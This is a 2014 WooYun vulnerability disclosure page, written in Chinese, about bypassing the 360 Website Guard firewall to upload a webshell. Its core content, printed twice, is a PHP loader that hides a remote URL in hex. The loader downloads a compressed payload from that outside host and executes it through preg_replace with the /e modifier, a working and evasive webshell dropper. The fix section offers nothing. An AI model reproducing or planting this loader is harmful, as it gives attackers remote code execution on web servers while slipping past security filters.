当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052181

漏洞标题:绕过360网站卫士上传大马(Webshell)

相关厂商:奇虎360

漏洞作者: 蓝莓说

提交时间:2014-03-18 10:40

修复时间:2014-05-02 10:41

公开时间:2014-05-02 10:41

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-18: 细节已通知厂商并且等待厂商处理中
2014-03-18: 厂商已经确认,细节仅向厂商公开
2014-03-28: 细节向核心白帽子及相关领域专家公开
2014-04-07: 细节向普通白帽子公开
2014-04-17: 细节向实习白帽子公开
2014-05-02: 细节向公众公开

简要描述:

绕过360网站卫士 上传大马 最近最近写的脚本

详细说明:

漏洞证明:这个是被杀的

@47~T7M`OAJ)F`VH1LQXMGK.jpg


9I~T7L4UCV1FU[9NQ6Z]]ZW.jpg


下一个给你看没有被杀:

00P)1I}20_L2Y0LE6(ROZBD.jpg



X]C[2%V0(HQ[HC5T36J[SR2.jpg


你看吧我没做加 我写的代码贴出来:

<?php
error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>



你们解决 我吃饭去了

漏洞证明:

漏洞证明:这个是被杀的

@47~T7M`OAJ)F`VH1LQXMGK.jpg


9I~T7L4UCV1FU[9NQ6Z]]ZW.jpg


下一个给你看没有被杀:

00P)1I}20_L2Y0LE6(ROZBD.jpg



X]C[2%V0(HQ[HC5T36J[SR2.jpg


你看吧我没做加 我写的代码贴出来:

<?php
error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>



QNJG419N$(`$7]LDI{](J{6.jpg



你们解决 我吃饭去了

修复方案:

你懂得

版权声明:转载请注明来源 蓝莓说@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-18 17:57

厂商回复:

非常感谢您对360网站卫士的关注!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-03-18 13:29 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:51 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

    拿RMB的节奏